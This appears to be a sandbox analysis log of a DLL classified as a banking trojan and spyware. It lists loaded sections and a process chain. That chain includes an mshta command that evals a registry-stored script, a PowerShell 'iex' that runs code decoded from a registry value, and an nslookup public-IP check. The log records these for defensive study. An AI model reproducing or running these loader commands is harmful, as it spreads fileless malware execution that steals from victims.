            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: @ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ? .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: > .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: = .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: < .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ; .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: : .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 9 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 8 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 7 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 6 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 5 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 4 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 3 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 2 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 1 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: 0 .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: - .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: , .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: + .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: * .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ) .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ( .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: & .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: % .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: $ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: # .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ' .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ! .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ~ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: } .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: | .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: { .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: d .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: c .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: b .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: a .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ` .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: _ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ^ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ] .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: [ .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: z .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: y .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: x .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: w .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: v .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: u .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: t .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: s .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: r .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: q .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: p .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: o .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: n .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: m .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: l .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: k .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: j .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: i .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: h .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: g .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: f .dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: e .dll
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@49/188@15/6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A8A648 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{59229456-2F94-11EB-90E6-ECF4BB82F7E0}.datJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{0C6A49DB-FB1D-1E7B-E500-5F32E9340386}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{2C9A59B6-9B4F-3EC0-8520-FF528954A3A6}
            Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DF876656104E15310A.TMPJump to behavior
            Source: vnaSKDMnLG.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: vnaSKDMnLG.dllVirustotal: Detection: 11%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\vnaSKDMnLG.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
            Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
